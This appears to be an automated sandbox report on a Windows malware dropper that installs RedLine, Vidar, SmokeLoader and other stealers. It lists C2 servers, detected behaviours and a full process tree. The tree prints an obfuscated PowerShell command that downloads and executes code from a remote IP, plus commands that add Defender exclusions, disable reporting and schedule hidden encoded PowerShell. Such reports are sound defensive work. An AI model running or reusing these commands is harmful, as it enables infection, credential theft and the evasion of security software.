Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 03:25

General

  • Target

    6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe

  • Size

    3.5MB

  • MD5

    fa71fd47496dbdaf60a10997b33f3354

  • SHA1

    3dd0dbfd044afe884961dc16e6fa97656a60346f

  • SHA256

    6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930

  • SHA512

    929730416a2e5392828fbbfd4f5529326e8d40d73f069d0903d71688a3f057dc8e1f28ee9bb9f350abefb37e2ad948cabf19b994044fa11d4a20bb3aecc06aad

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Family

vidar

Version

39.4

Botnet

933

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

Ani

C2

detuyaluro.xyz:80

Extracted

Family

redline

Botnet

fdfsdf

C2

86.107.197.196:63065

Attributes
  • auth_value

    49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

Travis

C2

5.182.5.22:33809

Attributes
  • auth_value

    6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

jack

C2

5.182.5.203:33873

Attributes
  • auth_value

    6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

ruzki (check bio)

C2

103.133.111.182:44839

Attributes
  • auth_value

    767fa45398d3ac4a23de20d0480c2b03

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 40 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe
    "C:\Users\Admin\AppData\Local\Temp\6a4b34f30116df6f9360612fa3841cbcfa378da53cbe04d55a56ea1eca823930.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3380
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_1.exe
          sahiba_1.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Modifies registry class
          PID:4148
          • C:\Windows\SysWOW64\rUNdlL32.eXe
            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",setpwd
            5⤵
            • Loads dropped DLL
            PID:260
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 260 -s 600
              6⤵
              • Program crash
              PID:4400
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_4.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_4.exe
          sahiba_4.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4612
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:3672
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_3.exe
          sahiba_3.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:1748
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 932
            5⤵
            • Program crash
            PID:4976
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_5.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4492
        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_5.exe
          sahiba_5.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Users\Admin\AppData\Local\Temp\is-8IPPU.tmp\sahiba_5.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-8IPPU.tmp\sahiba_5.tmp" /SL5="$70066,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_5.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1768
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_7.exe
          sahiba_7.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:3424
          • C:\Users\Admin\Documents\YiFzlpwSCQlBn3rwjA3F0K3R.exe
            "C:\Users\Admin\Documents\YiFzlpwSCQlBn3rwjA3F0K3R.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Checks processor information in registry
            PID:1848
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im YiFzlpwSCQlBn3rwjA3F0K3R.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\YiFzlpwSCQlBn3rwjA3F0K3R.exe" & del C:\ProgramData\*.dll & exit
              6⤵
                PID:2304
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im YiFzlpwSCQlBn3rwjA3F0K3R.exe /f
                  7⤵
                  • Kills process with taskkill
                  PID:4056
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  7⤵
                  • Delays execution with timeout.exe
                  PID:4796
            • C:\Users\Admin\Documents\3Exlnwjwj2eD27xc7rdrPmAb.exe
              "C:\Users\Admin\Documents\3Exlnwjwj2eD27xc7rdrPmAb.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              PID:2300
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                6⤵
                  PID:5044
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd
                    7⤵
                      PID:5084
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /FI "imagename eq BullGuardCore.exe"
                        8⤵
                        • Enumerates processes with tasklist
                        PID:1240
                      • C:\Windows\SysWOW64\find.exe
                        find /I /N "bullguardcore.exe"
                        8⤵
                          PID:4388
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /FI "imagename eq PSUAService.exe"
                          8⤵
                          • Enumerates processes with tasklist
                          PID:4800
                        • C:\Windows\SysWOW64\find.exe
                          find /I /N "psuaservice.exe"
                          8⤵
                            PID:4012
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                            8⤵
                              PID:1440
                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                              Accostarmi.exe.pif N
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:4512
                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                9⤵
                                • Executes dropped EXE
                                PID:4392
                            • C:\Windows\SysWOW64\waitfor.exe
                              waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
                              8⤵
                                PID:4660
                        • C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                          "C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe"
                          5⤵
                            PID:4828
                            • C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              6⤵
                              • Executes dropped EXE
                              PID:1408
                            • C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              6⤵
                              • Executes dropped EXE
                              PID:2420
                            • C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              C:\Users\Admin\Documents\BFi_TJPWZJkTuOWsoerHNaA3.exe
                              6⤵
                              • Executes dropped EXE
                              PID:2832
                          • C:\Users\Admin\Documents\MNV4mOTBB8wezb70Z5fHbDXW.exe
                            "C:\Users\Admin\Documents\MNV4mOTBB8wezb70Z5fHbDXW.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:400
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 432
                              6⤵
                              • Program crash
                              PID:4316
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 440
                              6⤵
                              • Program crash
                              PID:1844
                          • C:\Users\Admin\Documents\esCpFPcCmP7748r3fr9h7Ua1.exe
                            "C:\Users\Admin\Documents\esCpFPcCmP7748r3fr9h7Ua1.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            PID:1556
                          • C:\Users\Admin\Documents\4LyMthVH79oRM68dHNMgM9W1.exe
                            "C:\Users\Admin\Documents\4LyMthVH79oRM68dHNMgM9W1.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:3676
                          • C:\Users\Admin\Documents\kym7Xu4evAXUfJ11zp7kw7S7.exe
                            "C:\Users\Admin\Documents\kym7Xu4evAXUfJ11zp7kw7S7.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:220
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 444
                              6⤵
                              • Program crash
                              PID:1220
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 472
                              6⤵
                              • Program crash
                              PID:3204
                          • C:\Users\Admin\Documents\Z3D_JNvsR3FMTWP7skwOrluW.exe
                            "C:\Users\Admin\Documents\Z3D_JNvsR3FMTWP7skwOrluW.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:4980
                          • C:\Users\Admin\Documents\8vvQSz00FHJyNhWZqxsWXL04.exe
                            "C:\Users\Admin\Documents\8vvQSz00FHJyNhWZqxsWXL04.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:4548
                          • C:\Users\Admin\Documents\MI8WE9Em59x_gGRti8oaIjkQ.exe
                            "C:\Users\Admin\Documents\MI8WE9Em59x_gGRti8oaIjkQ.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:4392
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 428
                              6⤵
                              • Program crash
                              PID:3396
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 440
                              6⤵
                              • Program crash
                              PID:4956
                          • C:\Users\Admin\Documents\lTpjP2pRHJmO2B9lvpXMSNRL.exe
                            "C:\Users\Admin\Documents\lTpjP2pRHJmO2B9lvpXMSNRL.exe"
                            5⤵
                            • Executes dropped EXE
                            PID:4968
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 440
                              6⤵
                              • Program crash
                              PID:3208
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 448
                              6⤵
                              • Program crash
                              PID:4756
                          • C:\Users\Admin\Documents\ytstqisMtDvVjWbSMBPuZ8jv.exe
                            "C:\Users\Admin\Documents\ytstqisMtDvVjWbSMBPuZ8jv.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:1304
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1324
                              6⤵
                              • Program crash
                              PID:2304
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1332
                              6⤵
                              • Program crash
                              PID:1944
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1360
                              6⤵
                              • Program crash
                              PID:4992
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1356
                              6⤵
                              • Program crash
                              PID:1504
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im "ytstqisMtDvVjWbSMBPuZ8jv.exe" /f & erase "C:\Users\Admin\Documents\ytstqisMtDvVjWbSMBPuZ8jv.exe" & exit
                              6⤵
                                PID:2952
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im "ytstqisMtDvVjWbSMBPuZ8jv.exe" /f
                                  7⤵
                                  • Kills process with taskkill
                                  PID:2432
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1384
                                6⤵
                                • Program crash
                                PID:3956
                            • C:\Users\Admin\Documents\fOg5_OXT44T2xOszAqQzXM84.exe
                              "C:\Users\Admin\Documents\fOg5_OXT44T2xOszAqQzXM84.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of SetWindowsHookEx
                              PID:3852
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                6⤵
                                • Blocklisted process makes network request
                                • Suspicious use of SetThreadContext
                                PID:4472
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  7⤵
                                    PID:2028
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Adds Run key to start application
                                  • Checks processor information in registry
                                  PID:332
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
                                  6⤵
                                  • Blocklisted process makes network request
                                  • Suspicious use of SetThreadContext
                                  PID:2332
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    7⤵
                                      PID:1184
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1184 -s 300
                                        8⤵
                                        • Program crash
                                        PID:1736
                                • C:\Users\Admin\Documents\CF_c8APbJOMK0Io0juK0Y_UZ.exe
                                  "C:\Users\Admin\Documents\CF_c8APbJOMK0Io0juK0Y_UZ.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2624
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\CF_c8APbJOMK0Io0juK0Y_UZ.exe
                                    6⤵
                                      PID:3024
                                      • C:\Windows\system32\choice.exe
                                        choice /C Y /N /D Y /T 0
                                        7⤵
                                          PID:992
                                    • C:\Users\Admin\Documents\_2Zon7bE03pOh2DfjVPSXy0A.exe
                                      "C:\Users\Admin\Documents\_2Zon7bE03pOh2DfjVPSXy0A.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:1584
                                      • C:\Users\Admin\AppData\Local\Temp\7zS1A08.tmp\Install.exe
                                        .\Install.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4156
                                        • C:\Users\Admin\AppData\Local\Temp\7zS2AF1.tmp\Install.exe
                                          .\Install.exe /S /site_id "525403"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks computer location settings
                                          • Drops file in System32 directory
                                          • Enumerates system info in registry
                                          PID:3448
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                            8⤵
                                              PID:1724
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                9⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4828
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                9⤵
                                                  PID:5020
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                    10⤵
                                                      PID:2724
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                      10⤵
                                                        PID:2824
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                    8⤵
                                                      PID:1284
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                        9⤵
                                                          PID:3796
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                            10⤵
                                                              PID:4512
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                              10⤵
                                                                PID:2008
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "gNTKdbMVm" /SC once /ST 00:56:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            8⤵
                                                            • Creates scheduled task(s)
                                                            PID:1840
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gNTKdbMVm"
                                                            8⤵
                                                              PID:2000
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "gNTKdbMVm"
                                                              8⤵
                                                                PID:1396
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\YWWUkCi.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                8⤵
                                                                • Drops file in Windows directory
                                                                • Creates scheduled task(s)
                                                                PID:3476
                                                        • C:\Users\Admin\Documents\aVEz16x1QqhmQBOjL8y3JtNW.exe
                                                          "C:\Users\Admin\Documents\aVEz16x1QqhmQBOjL8y3JtNW.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious use of SetThreadContext
                                                          PID:1768
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            6⤵
                                                              PID:4988
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              6⤵
                                                                PID:3324
                                                            • C:\Users\Admin\Documents\NTDFn6lbglnVBSPYC3nXnjAW.exe
                                                              "C:\Users\Admin\Documents\NTDFn6lbglnVBSPYC3nXnjAW.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4464
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                6⤵
                                                                  PID:3192
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:4384
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4580
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_6.exe
                                                              sahiba_6.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4512
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sahiba_2.exe
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4576
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_2.exe
                                                              sahiba_2.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:4708
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c sahiba_8.exe
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2068
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0D807E1D\sahiba_8.exe
                                                              sahiba_8.exe
                                                              4⤵
